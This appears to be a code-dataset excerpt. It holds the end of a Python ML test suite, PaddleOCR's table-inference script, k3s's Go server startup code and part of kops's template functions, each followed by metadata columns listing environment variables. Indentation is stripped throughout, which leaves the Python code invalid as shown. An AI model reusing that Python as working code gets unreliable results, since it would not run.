# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.2 < duration.total_seconds() / 1.0 < 15
# 3. make sure we're not modifying the dictionaries
# (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
second_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -3.4
def test_all_algos_classification(model_name=None):
np.random.seed(0)
df_titanic_train, df_titanic_test = utils.get_titanic_binary_classification_dataset()
column_descriptions = {
'survived': 'output',
'sex': 'categorical',
'embarked': 'categorical',
'pclass': 'categorical'
}
ml_predictor = Predictor(
type_of_estimator='classifier', column_descriptions=column_descriptions)
ml_predictor.train(
df_titanic_train,
model_names=[
'LogisticRegression', 'RandomForestClassifier', 'RidgeClassifier',
'GradientBoostingClassifier', 'ExtraTreesClassifier', 'AdaBoostClassifier',
'SGDClassifier', 'Perceptron', 'PassiveAggressiveClassifier', 'DeepLearningClassifier',
'XGBClassifier', 'LGBMClassifier', 'LinearSVC'
])
test_score = ml_predictor.score(df_titanic_test, df_titanic_test.survived)
print('test_score')
print(test_score)
# Linear models aren't super great on this dataset...
assert -0.215 < test_score < -0.131
def test_all_algos_regression():
# a random seed of 42 has ExtraTreesRegressor getting the best CV score,
# and that model doesn't generalize as well as GradientBoostingRegressor.
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
column_descriptions = {'MEDV': 'output', 'CHAS': 'categorical'}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
ml_predictor.train(
df_boston_train,
model_names=[
'LinearRegression', 'RandomForestRegressor', 'Ridge', 'GradientBoostingRegressor',
'AdaBoostRegressor', 'SGDRegressor', 'PassiveAggressiveRegressor', 'Lasso', 'LassoLars',
'ElasticNet', 'OrthogonalMatchingPursuit', 'BayesianRidge', 'ARDRegression',
'MiniBatchKMeans', 'DeepLearningRegressor', 'LGBMRegressor', 'XGBClassifier',
'LinearSVR', 'CatBoostRegressor'
])
test_score = ml_predictor.score(df_boston_test, df_boston_test.MEDV)
print('test_score')
print(test_score)
assert -3.4 < test_score < -2.8
def test_throws_warning_when_fl_data_equals_df_train():
df_titanic_train, df_titanic_test = utils.get_titanic_binary_classification_dataset()
column_descriptions = {
'survived': 'output',
'sex': 'categorical',
'embarked': 'categorical',
'pclass': 'categorical'
}
ml_predictor = Predictor(
type_of_estimator='classifier', column_descriptions=column_descriptions)
with warnings.catch_warnings(record=True) as w:
try:
ml_predictor.train(df_titanic_train, feature_learning=True, fl_data=df_titanic_train)
except KeyError as e:
pass
# We should not be getting to this line- we should be throwing an error above
for thing in w:
print(thing)
assert len(w) >= 1
assert True
|
[] |
[] |
[
"is_test_suite"
] |
[]
|
["is_test_suite"]
|
python
| 1 | 0 | |
tools/infer_table.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import os
import sys
import json
__dir__ = os.path.dirname(os.path.abspath(__file__))
sys.path.append(__dir__)
sys.path.append(os.path.abspath(os.path.join(__dir__, '..')))
os.environ["FLAGS_allocator_strategy"] = 'auto_growth'
import paddle
from paddle.jit import to_static
from ppocr.data import create_operators, transform
from ppocr.modeling.architectures import build_model
from ppocr.postprocess import build_post_process
from ppocr.utils.save_load import init_model
from ppocr.utils.utility import get_image_file_list
import tools.program as program
import cv2
def main(config, device, logger, vdl_writer):
global_config = config['Global']
# build post process
post_process_class = build_post_process(config['PostProcess'],
global_config)
# build model
if hasattr(post_process_class, 'character'):
config['Architecture']["Head"]['out_channels'] = len(
getattr(post_process_class, 'character'))
model = build_model(config['Architecture'])
init_model(config, model, logger)
# create data ops
transforms = []
use_padding = False
for op in config['Eval']['dataset']['transforms']:
op_name = list(op)[0]
if 'Label' in op_name:
continue
if op_name == 'KeepKeys':
op[op_name]['keep_keys'] = ['image']
if op_name == "ResizeTableImage":
use_padding = True
padding_max_len = op['ResizeTableImage']['max_len']
transforms.append(op)
global_config['infer_mode'] = True
ops = create_operators(transforms, global_config)
model.eval()
for file in get_image_file_list(config['Global']['infer_img']):
logger.info("infer_img: {}".format(file))
with open(file, 'rb') as f:
img = f.read()
data = {'image': img}
batch = transform(data, ops)
images = np.expand_dims(batch[0], axis=0)
images = paddle.to_tensor(images)
preds = model(images)
post_result = post_process_class(preds)
res_html_code = post_result['res_html_code']
res_loc = post_result['res_loc']
img = cv2.imread(file)
imgh, imgw = img.shape[0:2]
res_loc_final = []
for rno in range(len(res_loc[0])):
x0, y0, x1, y1 = res_loc[0][rno]
left = max(int(imgw * x0), 0)
top = max(int(imgh * y0), 0)
right = min(int(imgw * x1), imgw - 1)
bottom = min(int(imgh * y1), imgh - 1)
cv2.rectangle(img, (left, top), (right, bottom), (0, 0, 255), 2)
res_loc_final.append([left, top, right, bottom])
res_loc_str = json.dumps(res_loc_final)
logger.info("result: {}, {}".format(res_html_code, res_loc_final))
logger.info("success!")
if __name__ == '__main__':
config, device, logger, vdl_writer = program.preprocess()
main(config, device, logger, vdl_writer)
|
[] |
[] |
[
"FLAGS_allocator_strategy"
] |
[]
|
["FLAGS_allocator_strategy"]
|
python
| 1 | 0 | |
pkg/cli/server/server.go
|
package server
import (
"context"
"fmt"
net2 "net"
"os"
"path/filepath"
"strings"
systemd "github.com/coreos/go-systemd/daemon"
"github.com/pkg/errors"
"github.com/rancher/k3s/pkg/agent"
"github.com/rancher/k3s/pkg/cli/cmds"
"github.com/rancher/k3s/pkg/datadir"
"github.com/rancher/k3s/pkg/netutil"
"github.com/rancher/k3s/pkg/rootless"
"github.com/rancher/k3s/pkg/server"
"github.com/rancher/wrangler/pkg/signals"
"github.com/sirupsen/logrus"
"github.com/urfave/cli"
"k8s.io/apimachinery/pkg/util/net"
"k8s.io/kubernetes/pkg/master"
_ "github.com/go-sql-driver/mysql" // ensure we have mysql
_ "github.com/lib/pq" // ensure we have postgres
_ "github.com/mattn/go-sqlite3" // ensure we have sqlite
)
func Run(app *cli.Context) error {
if err := cmds.InitLogging(); err != nil {
return err
}
return run(app, &cmds.ServerConfig)
}
func run(app *cli.Context, cfg *cmds.Server) error {
var (
err error
)
if !cfg.DisableAgent && os.Getuid() != 0 && !cfg.Rootless {
return fmt.Errorf("must run as root unless --disable-agent is specified")
}
if cfg.Rootless {
dataDir, err := datadir.LocalHome(cfg.DataDir, true)
if err != nil {
return err
}
cfg.DataDir = dataDir
if err := rootless.Rootless(dataDir); err != nil {
return err
}
}
serverConfig := server.Config{}
serverConfig.ControlConfig.ClusterSecret = cfg.ClusterSecret
serverConfig.ControlConfig.DataDir = cfg.DataDir
serverConfig.ControlConfig.KubeConfigOutput = cfg.KubeConfigOutput
serverConfig.ControlConfig.KubeConfigMode = cfg.KubeConfigMode
serverConfig.ControlConfig.NoScheduler = cfg.DisableScheduler
serverConfig.Rootless = cfg.Rootless
serverConfig.TLSConfig.HTTPSPort = cfg.HTTPSPort
serverConfig.TLSConfig.HTTPPort = cfg.HTTPPort
for _, san := range knownIPs(cfg.TLSSan) {
addr := net2.ParseIP(san)
if addr != nil {
serverConfig.TLSConfig.KnownIPs = append(serverConfig.TLSConfig.KnownIPs, san)
} else {
serverConfig.TLSConfig.Domains = append(serverConfig.TLSConfig.Domains, san)
}
}
serverConfig.TLSConfig.BindAddress = cfg.BindAddress
serverConfig.ControlConfig.HTTPSPort = cfg.HTTPSPort
serverConfig.ControlConfig.ExtraAPIArgs = cfg.ExtraAPIArgs
serverConfig.ControlConfig.ExtraControllerArgs = cfg.ExtraControllerArgs
serverConfig.ControlConfig.ExtraSchedulerAPIArgs = cfg.ExtraSchedulerArgs
serverConfig.ControlConfig.ClusterDomain = cfg.ClusterDomain
serverConfig.ControlConfig.Storage.Endpoint = cfg.StorageEndpoint
serverConfig.ControlConfig.Storage.CAFile = cfg.StorageCAFile
serverConfig.ControlConfig.Storage.CertFile = cfg.StorageCertFile
serverConfig.ControlConfig.Storage.KeyFile = cfg.StorageKeyFile
serverConfig.ControlConfig.AdvertiseIP = cfg.AdvertiseIP
serverConfig.ControlConfig.AdvertisePort = cfg.AdvertisePort
serverConfig.ControlConfig.BootstrapReadOnly = !cfg.StoreBootstrap
serverConfig.ControlConfig.FlannelBackend = cfg.FlannelBackend
serverConfig.ControlConfig.ExtraCloudControllerArgs = cfg.ExtraCloudControllerArgs
serverConfig.ControlConfig.DisableCCM = cfg.DisableCCM
serverConfig.ControlConfig.DisableNPC = cfg.DisableNPC
if cmds.AgentConfig.FlannelIface != "" && cmds.AgentConfig.NodeIP == "" {
cmds.AgentConfig.NodeIP = netutil.GetIPFromInterface(cmds.AgentConfig.FlannelIface)
}
if serverConfig.ControlConfig.AdvertiseIP == "" && cmds.AgentConfig.NodeIP != "" {
serverConfig.ControlConfig.AdvertiseIP = cmds.AgentConfig.NodeIP
}
if serverConfig.ControlConfig.AdvertiseIP != "" {
serverConfig.TLSConfig.KnownIPs = append(serverConfig.TLSConfig.KnownIPs, serverConfig.ControlConfig.AdvertiseIP)
}
_, serverConfig.ControlConfig.ClusterIPRange, err = net2.ParseCIDR(cfg.ClusterCIDR)
if err != nil {
return errors.Wrapf(err, "Invalid CIDR %s: %v", cfg.ClusterCIDR, err)
}
_, serverConfig.ControlConfig.ServiceIPRange, err = net2.ParseCIDR(cfg.ServiceCIDR)
if err != nil {
return errors.Wrapf(err, "Invalid CIDR %s: %v", cfg.ServiceCIDR, err)
}
_, apiServerServiceIP, err := master.DefaultServiceIPRange(*serverConfig.ControlConfig.ServiceIPRange)
if err != nil {
return err
}
serverConfig.TLSConfig.KnownIPs = append(serverConfig.TLSConfig.KnownIPs, apiServerServiceIP.String())
// If cluster-dns CLI arg is not set, we set ClusterDNS address to be ServiceCIDR network + 10,
// i.e. when you set service-cidr to 192.168.0.0/16 and don't provide cluster-dns, it will be set to 192.168.0.10
if cfg.ClusterDNS == "" {
serverConfig.ControlConfig.ClusterDNS = make(net2.IP, 4)
copy(serverConfig.ControlConfig.ClusterDNS, serverConfig.ControlConfig.ServiceIPRange.IP.To4())
serverConfig.ControlConfig.ClusterDNS[3] = 10
} else {
serverConfig.ControlConfig.ClusterDNS = net2.ParseIP(cfg.ClusterDNS)
}
if cfg.DefaultLocalStoragePath == "" {
dataDir, err := datadir.LocalHome(cfg.DataDir, false)
if err != nil {
return err
}
serverConfig.ControlConfig.DefaultLocalStoragePath = filepath.Join(dataDir, "/storage")
} else {
serverConfig.ControlConfig.DefaultLocalStoragePath = cfg.DefaultLocalStoragePath
}
noDeploys := make([]string, 0)
for _, noDeploy := range app.StringSlice("no-deploy") {
for _, splitNoDeploy := range strings.Split(noDeploy, ",") {
noDeploys = append(noDeploys, splitNoDeploy)
}
}
for _, noDeploy := range noDeploys {
if noDeploy == "servicelb" {
serverConfig.DisableServiceLB = true
continue
}
if !strings.HasSuffix(noDeploy, ".yaml") {
noDeploy = noDeploy + ".yaml"
}
serverConfig.ControlConfig.Skips = append(serverConfig.ControlConfig.Skips, noDeploy)
}
logrus.Info("Starting k3s ", app.App.Version)
notifySocket := os.Getenv("NOTIFY_SOCKET")
os.Unsetenv("NOTIFY_SOCKET")
ctx := signals.SetupSignalHandler(context.Background())
certs, err := server.StartServer(ctx, &serverConfig)
if err != nil {
return err
}
logrus.Info("k3s is up and running")
if notifySocket != "" {
os.Setenv("NOTIFY_SOCKET", notifySocket)
systemd.SdNotify(true, "READY=1\n")
}
if cfg.DisableAgent {
<-ctx.Done()
return nil
}
ip := serverConfig.TLSConfig.BindAddress
if ip == "" {
ip = "127.0.0.1"
}
url := fmt.Sprintf("https://%s:%d", ip, serverConfig.TLSConfig.HTTPSPort)
token := server.FormatToken(serverConfig.ControlConfig.Runtime.NodeToken, certs)
agentConfig := cmds.AgentConfig
agentConfig.Debug = app.GlobalBool("bool")
agentConfig.DataDir = filepath.Dir(serverConfig.ControlConfig.DataDir)
agentConfig.ServerURL = url
agentConfig.Token = token
agentConfig.DisableLoadBalancer = true
agentConfig.Rootless = cfg.Rootless
if agentConfig.Rootless {
// let agent specify Rootless kubelet flags, but not unshare twice
agentConfig.RootlessAlreadyUnshared = true
}
return agent.Run(ctx, agentConfig)
}
func knownIPs(ips []string) []string {
ips = append(ips, "127.0.0.1")
ip, err := net.ChooseHostInterface()
if err == nil {
ips = append(ips, ip.String())
}
return ips
}
|
[
"\"NOTIFY_SOCKET\""
] |
[] |
[
"NOTIFY_SOCKET"
] |
[]
|
["NOTIFY_SOCKET"]
|
go
| 1 | 0 | |
upup/pkg/fi/cloudup/template_functions.go
|
/*
Copyright 2019 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
/******************************************************************************
Template Functions are what map functions in the models, to internal logic in
kops. This is the point where we connect static YAML configuration to dynamic
runtime values in memory.
When defining a new function:
- Build the new function here
- Define the new function in AddTo()
dest["MyNewFunction"] = MyNewFunction // <-- Function Pointer
******************************************************************************/
package cloudup
import (
"encoding/base64"
"encoding/json"
"fmt"
"os"
"path"
"sort"
"strconv"
"strings"
"text/template"
"github.com/Masterminds/sprig/v3"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/klog/v2"
kopscontrollerconfig "k8s.io/kops/cmd/kops-controller/pkg/config"
"k8s.io/kops/pkg/apis/kops"
apiModel "k8s.io/kops/pkg/apis/kops/model"
"k8s.io/kops/pkg/apis/kops/util"
"k8s.io/kops/pkg/dns"
"k8s.io/kops/pkg/featureflag"
"k8s.io/kops/pkg/model"
"k8s.io/kops/pkg/resources/spotinst"
"k8s.io/kops/pkg/wellknownports"
"k8s.io/kops/upup/pkg/fi"
"k8s.io/kops/upup/pkg/fi/cloudup/awsup"
"k8s.io/kops/upup/pkg/fi/cloudup/gce"
"k8s.io/kops/util/pkg/env"
)
// TemplateFunctions provides a collection of methods used throughout the templates
type TemplateFunctions struct {
model.KopsModelContext
cloud fi.Cloud
}
// AddTo defines the available functions we can use in our YAML models.
// If we are trying to get a new function implemented it MUST
// be defined here.
func (tf *TemplateFunctions) AddTo(dest template.FuncMap, secretStore fi.SecretStore) (err error) {
cluster := tf.Cluster
dest["EtcdScheme"] = tf.EtcdScheme
dest["SharedVPC"] = tf.SharedVPC
dest["ToJSON"] = tf.ToJSON
dest["UseBootstrapTokens"] = tf.UseBootstrapTokens
dest["UseEtcdTLS"] = tf.UseEtcdTLS
// Remember that we may be on a different arch from the target. Hard-code for now.
dest["replace"] = func(s, find, replace string) string {
return strings.Replace(s, find, replace, -1)
}
dest["join"] = func(a []string, sep string) string {
return strings.Join(a, sep)
}
sprigTxtFuncMap := sprig.TxtFuncMap()
dest["indent"] = sprigTxtFuncMap["indent"]
dest["contains"] = sprigTxtFuncMap["contains"]
dest["trimPrefix"] = sprigTxtFuncMap["trimPrefix"]
dest["semverCompare"] = sprigTxtFuncMap["semverCompare"]
dest["ClusterName"] = tf.ClusterName
dest["WithDefaultBool"] = func(v *bool, defaultValue bool) bool {
if v != nil {
return *v
}
return defaultValue
}
dest["GetInstanceGroup"] = tf.GetInstanceGroup
dest["GetNodeInstanceGroups"] = tf.GetNodeInstanceGroups
dest["HasHighlyAvailableControlPlane"] = tf.HasHighlyAvailableControlPlane
dest["ControlPlaneControllerReplicas"] = tf.ControlPlaneControllerReplicas
dest["CloudTags"] = tf.CloudTagsForInstanceGroup
dest["KubeDNS"] = func() *kops.KubeDNSConfig {
return cluster.Spec.KubeDNS
}
dest["NodeLocalDNSClusterIP"] = func() string {
if cluster.Spec.KubeProxy.ProxyMode == "ipvs" {
return cluster.Spec.KubeDNS.ServerIP
}
return "__PILLAR__CLUSTER__DNS__"
}
dest["NodeLocalDNSHealthCheck"] = func() string {
return fmt.Sprintf("%d", wellknownports.NodeLocalDNSHealthCheck)
}
dest["KopsControllerArgv"] = tf.KopsControllerArgv
dest["KopsControllerConfig"] = tf.KopsControllerConfig
dest["DnsControllerArgv"] = tf.DNSControllerArgv
dest["ExternalDnsArgv"] = tf.ExternalDNSArgv
dest["CloudControllerConfigArgv"] = tf.CloudControllerConfigArgv
// TODO: Only for GCE?
dest["EncodeGCELabel"] = gce.EncodeGCELabel
dest["Region"] = func() string {
return tf.Region
}
// will return openstack external ccm image location for current kubernetes version
dest["OpenStackCCMTag"] = tf.OpenStackCCMTag
dest["ProxyEnv"] = tf.ProxyEnv
dest["KopsSystemEnv"] = tf.KopsSystemEnv
dest["UseKopsControllerForNodeBootstrap"] = func() bool {
return tf.UseKopsControllerForNodeBootstrap()
}
dest["DO_TOKEN"] = func() string {
return os.Getenv("DIGITALOCEAN_ACCESS_TOKEN")
}
if featureflag.Spotinst.Enabled() {
if creds, err := spotinst.LoadCredentials(); err == nil {
dest["SpotinstToken"] = func() string { return creds.Token }
dest["SpotinstAccount"] = func() string { return creds.Account }
dest["SpotinstTokenBase64"] = func() string { return base64.StdEncoding.EncodeToString([]byte(creds.Token)) }
dest["SpotinstAccountBase64"] = func() string { return base64.StdEncoding.EncodeToString([]byte(creds.Account)) }
}
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.AmazonVPC != nil {
c := cluster.Spec.Networking.AmazonVPC
dest["AmazonVpcEnvVars"] = func() map[string]string {
envVars := map[string]string{
"AWS_VPC_K8S_CNI_CONFIGURE_RPFILTER": "false",
}
for _, e := range c.Env {
envVars[e.Name] = e.Value
}
return envVars
}
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.Calico != nil {
c := cluster.Spec.Networking.Calico
dest["CalicoIPv4PoolIPIPMode"] = func() string {
if c.EncapsulationMode != "ipip" {
return "Never"
}
if c.IPIPMode != "" {
return c.IPIPMode
}
if kops.CloudProviderID(cluster.Spec.CloudProvider) == kops.CloudProviderOpenstack {
return "Always"
}
return "CrossSubnet"
}
dest["CalicoIPv4PoolVXLANMode"] = func() string {
if c.EncapsulationMode != "vxlan" {
return "Never"
}
if c.VXLANMode != "" {
return c.VXLANMode
}
return "CrossSubnet"
}
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.Cilium != nil {
ciliumsecretString := ""
ciliumsecret, _ := secretStore.Secret("ciliumpassword")
if ciliumsecret != nil {
ciliumsecretString, err = ciliumsecret.AsString()
if err != nil {
return err
}
klog.V(4).Info("Cilium secret function successfully registered")
}
dest["CiliumSecret"] = func() string { return ciliumsecretString }
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.Flannel != nil {
flannelBackendType := cluster.Spec.Networking.Flannel.Backend
if flannelBackendType == "" {
klog.Warningf("Defaulting flannel backend to udp (not a recommended configuration)")
flannelBackendType = "udp"
}
dest["FlannelBackendType"] = func() string { return flannelBackendType }
}
if cluster.Spec.Networking != nil && cluster.Spec.Networking.Weave != nil {
weavesecretString := ""
weavesecret, _ := secretStore.Secret("weavepassword")
if weavesecret != nil {
weavesecretString, err = weavesecret.AsString()
if err != nil {
return err
}
klog.V(4).Info("Weave secret function successfully registered")
}
dest["WeaveSecret"] = func() string { return weavesecretString }
}
dest["CloudLabels"] = func() string {
labels := []string{
fmt.Sprintf("KubernetesCluster=%s", cluster.ObjectMeta.Name),
}
for n, v := range cluster.Spec.CloudLabels {
labels = append(labels, fmt.Sprintf("%s=%s", n, v))
}
// ensure stable sorting of tags
sort.Strings(labels)
return strings.Join(labels, ",")
}
dest["IsIPv6Only"] = tf.IsIPv6Only
dest["UseServiceAccountExternalPermissions"] = tf.UseServiceAccountExternalPermissions
if cluster.Spec.NodeTerminationHandler != nil {
dest["DefaultQueueName"] = func() string {
s := strings.Replace(tf.ClusterName(), ".", "-", -1)
domain := ".amazonaws.com/"
if strings.Contains(tf.Region, "cn-") {
domain = ".amazonaws.com.cn/"
}
url := "https://sqs." + tf.Region + domain + tf.AWSAccountID + "/" + s + "-nth"
return url
}
dest["EnableSQSTerminationDraining"] = func() bool { return *cluster.Spec.NodeTerminationHandler.EnableSQSTerminationDraining }
}
return nil
}
// ToJSON returns a json representation of the struct or on error an empty string
func (tf *TemplateFunctions) ToJSON(data interface{}) string {
encoded, err := json.Marshal(data)
if err != nil {
return ""
}
return string(encoded)
}
// EtcdScheme parses and grabs the protocol to the etcd cluster
func (tf *TemplateFunctions) EtcdScheme() string {
if tf.UseEtcdTLS() {
return "https"
}
return "http"
}
// SharedVPC is a simple helper function which makes the templates for a shared VPC clearer
func (tf *TemplateFunctions) SharedVPC() bool {
return tf.Cluster.SharedVPC()
}
// GetInstanceGroup returns the instance group with the specified name
func (tf *TemplateFunctions) GetInstanceGroup(name string) (*kops.InstanceGroup, error) {
ig := tf.KopsModelContext.FindInstanceGroup(name)
if ig == nil {
return nil, fmt.Errorf("InstanceGroup %q not found", name)
}
return ig, nil
}
// ControlPlaneControllerReplicas returns the amount of replicas for a controllers that should run in the cluster
// If the cluster has a highly available control plane, this function will return 2, if it has 1 control plane node, it will return 1
func (tf *TemplateFunctions) ControlPlaneControllerReplicas() int {
if tf.HasHighlyAvailableControlPlane() {
return 2
}
return 1
}
// HasHighlyAvailableControlPlane returns true of the cluster has more than one control plane node. False otherwise.
func (tf *TemplateFunctions) HasHighlyAvailableControlPlane() bool {
cp := 0
for _, ig := range tf.InstanceGroups {
if ig.Spec.Role == kops.InstanceGroupRoleMaster {
cp++
if cp > 1 {
return true
}
}
}
return false
}
// CloudControllerConfigArgv returns the args to external cloud controller
func (tf *TemplateFunctions) CloudControllerConfigArgv() ([]string, error) {
cluster := tf.Cluster
if cluster.Spec.ExternalCloudControllerManager == nil {
return nil, fmt.Errorf("ExternalCloudControllerManager is nil")
}
var argv []string
if cluster.Spec.ExternalCloudControllerManager.Master != "" {
argv = append(argv, fmt.Sprintf("--master=%s", cluster.Spec.ExternalCloudControllerManager.Master))
}
if cluster.Spec.ExternalCloudControllerManager.LogLevel != 0 {
argv = append(argv, fmt.Sprintf("--v=%d", cluster.Spec.ExternalCloudControllerManager.LogLevel))
} else {
argv = append(argv, "--v=2")
}
if cluster.Spec.ExternalCloudControllerManager.CloudProvider != "" {
argv = append(argv, fmt.Sprintf("--cloud-provider=%s", cluster.Spec.ExternalCloudControllerManager.CloudProvider))
} else if cluster.Spec.CloudProvider != "" {
argv = append(argv, fmt.Sprintf("--cloud-provider=%s", cluster.Spec.CloudProvider))
} else {
return nil, fmt.Errorf("Cloud Provider is not set")
}
if cluster.Spec.ExternalCloudControllerManager.ClusterName != "" {
argv = append(argv, fmt.Sprintf("--cluster-name=%s", cluster.Spec.ExternalCloudControllerManager.ClusterName))
}
if cluster.Spec.ExternalCloudControllerManager.ClusterCIDR != "" {
argv = append(argv, fmt.Sprintf("--cluster-cidr=%s", cluster.Spec.ExternalCloudControllerManager.ClusterCIDR))
}
if cluster.Spec.ExternalCloudControllerManager.AllocateNodeCIDRs != nil {
argv = append(argv, fmt.Sprintf("--allocate-node-cidrs=%t", *cluster.Spec.ExternalCloudControllerManager.AllocateNodeCIDRs))
}
if cluster.Spec.ExternalCloudControllerManager.ConfigureCloudRoutes != nil {
argv = append(argv, fmt.Sprintf("--configure-cloud-routes=%t", *cluster.Spec.ExternalCloudControllerManager.ConfigureCloudRoutes))
}
if cluster.Spec.ExternalCloudControllerManager.CIDRAllocatorType != nil && *cluster.Spec.ExternalCloudControllerManager.CIDRAllocatorType != "" {
argv = append(argv, fmt.Sprintf("--cidr-allocator-type=%s", *cluster.Spec.ExternalCloudControllerManager.CIDRAllocatorType))
}
if cluster.Spec.ExternalCloudControllerManager.UseServiceAccountCredentials != nil {
argv = append(argv, fmt.Sprintf("--use-service-account-credentials=%t", *cluster.Spec.ExternalCloudControllerManager.UseServiceAccountCredentials))
} else {
argv = append(argv, fmt.Sprintf("--use-service-account-credentials=%t", true))
}
argv = append(argv, "--cloud-config=/etc/kubernetes/cloud.config")
return argv, nil
}
// DNSControllerArgv returns the args to the DNS controller
func (tf *TemplateFunctions) DNSControllerArgv() ([]string, error) {
cluster := tf.Cluster
var argv []string
argv = append(argv, "/dns-controller")
// @check if the dns controller has custom configuration
if cluster.Spec.ExternalDNS == nil {
argv = append(argv, []string{"--watch-ingress=false"}...)
klog.V(4).Infof("watch-ingress=false set on dns-controller")
} else {
// @check if the watch ingress is set
var watchIngress bool
if cluster.Spec.ExternalDNS.WatchIngress != nil {
watchIngress = fi.BoolValue(cluster.Spec.ExternalDNS.WatchIngress)
}
if watchIngress {
klog.Warningln("--watch-ingress=true set on dns-controller")
klog.Warningln("this may cause problems with previously defined services: https://github.com/kubernetes/kops/issues/2496")
}
argv = append(argv, fmt.Sprintf("--watch-ingress=%t", watchIngress))
if cluster.Spec.ExternalDNS.WatchNamespace != "" {
argv = append(argv, fmt.Sprintf("--watch-namespace=%s", cluster.Spec.ExternalDNS.WatchNamespace))
}
}
if dns.IsGossipHostname(cluster.Spec.MasterInternalName) {
argv = append(argv, "--dns=gossip")
// Configuration specifically for the DNS controller gossip
if cluster.Spec.DNSControllerGossipConfig != nil {
if cluster.Spec.DNSControllerGossipConfig.Protocol != nil {
argv = append(argv, "--gossip-protocol="+*cluster.Spec.DNSControllerGossipConfig.Protocol)
}
if cluster.Spec.DNSControllerGossipConfig.Listen != nil {
argv = append(argv, "--gossip-listen="+*cluster.Spec.DNSControllerGossipConfig.Listen)
}
if cluster.Spec.DNSControllerGossipConfig.Secret != nil {
argv = append(argv, "--gossip-secret="+*cluster.Spec.DNSControllerGossipConfig.Secret)
}
if cluster.Spec.DNSControllerGossipConfig.Seed != nil {
argv = append(argv, "--gossip-seed="+*cluster.Spec.DNSControllerGossipConfig.Seed)
} else {
argv = append(argv, fmt.Sprintf("--gossip-seed=127.0.0.1:%d", wellknownports.ProtokubeGossipWeaveMesh))
}
if cluster.Spec.DNSControllerGossipConfig.Secondary != nil {
if cluster.Spec.DNSControllerGossipConfig.Secondary.Protocol != nil {
argv = append(argv, "--gossip-protocol-secondary="+*cluster.Spec.DNSControllerGossipConfig.Secondary.Protocol)
}
if cluster.Spec.DNSControllerGossipConfig.Secondary.Listen != nil {
argv = append(argv, "--gossip-listen-secondary="+*cluster.Spec.DNSControllerGossipConfig.Secondary.Listen)
}
if cluster.Spec.DNSControllerGossipConfig.Secondary.Secret != nil {
argv = append(argv, "--gossip-secret-secondary="+*cluster.Spec.DNSControllerGossipConfig.Secondary.Secret)
}
if cluster.Spec.DNSControllerGossipConfig.Secondary.Seed != nil {
argv = append(argv, "--gossip-seed-secondary="+*cluster.Spec.DNSControllerGossipConfig.Secondary.Seed)
} else {
argv = append(argv, fmt.Sprintf("--gossip-seed-secondary=127.0.0.1:%d", wellknownports.ProtokubeGossipMemberlist))
}
}
} else {
// Default to primary mesh and secondary memberlist
argv = append(argv, fmt.Sprintf("--gossip-seed=127.0.0.1:%d", wellknownports.ProtokubeGossipWeaveMesh))
argv = append(argv, "--gossip-protocol-secondary=memberlist")
argv = append(argv, fmt.Sprintf("--gossip-listen-secondary=0.0.0.0:%d", wellknownports.DNSControllerGossipMemberlist))
argv = append(argv, fmt.Sprintf("--gossip-seed-secondary=127.0.0.1:%d", wellknownports.ProtokubeGossipMemberlist))
}
} else {
switch kops.CloudProviderID(cluster.Spec.CloudProvider) {
case kops.CloudProviderAWS:
if strings.HasPrefix(os.Getenv("AWS_REGION"), "cn-") {
argv = append(argv, "--dns=gossip")
} else {
argv = append(argv, "--dns=aws-route53")
}
case kops.CloudProviderGCE:
argv = append(argv, "--dns=google-clouddns")
case kops.CloudProviderDO:
argv = append(argv, "--dns=digitalocean")
default:
return nil, fmt.Errorf("unhandled cloudprovider %q", cluster.Spec.CloudProvider)
}
}
zone := cluster.Spec.DNSZone
if zone != "" {
if strings.Contains(zone, ".") {
// match by name
argv = append(argv, "--zone="+zone)
} else {
// match by id
argv = append(argv, "--zone=*/"+zone)
}
}
// permit wildcard updates
argv = append(argv, "--zone=*/*")
// Verbose, but not crazy logging
argv = append(argv, "-v=2")
return argv, nil
}
// KopsControllerConfig returns the yaml configuration for kops-controller
func (tf *TemplateFunctions) KopsControllerConfig() (string, error) {
cluster := tf.Cluster
config := &kopscontrollerconfig.Options{
Cloud: cluster.Spec.CloudProvider,
ConfigBase: cluster.Spec.ConfigBase,
}
if featureflag.CacheNodeidentityInfo.Enabled() {
config.CacheNodeidentityInfo = true
}
if tf.UseKopsControllerForNodeBootstrap() {
certNames := []string{"kubelet", "kubelet-server"}
signingCAs := []string{fi.CertificateIDCA}
if apiModel.UseCiliumEtcd(cluster) {
certNames = append(certNames, "etcd-client-cilium")
signingCAs = append(signingCAs, "etcd-clients-ca-cilium")
}
if cluster.Spec.KubeProxy.Enabled == nil || *cluster.Spec.KubeProxy.Enabled {
certNames = append(certNames, "kube-proxy")
}
if cluster.Spec.Networking.Kuberouter != nil {
certNames = append(certNames, "kube-router")
}
pkiDir := "/etc/kubernetes/kops-controller/pki"
config.Server = &kopscontrollerconfig.ServerOptions{
Listen: fmt.Sprintf(":%d", wellknownports.KopsControllerPort),
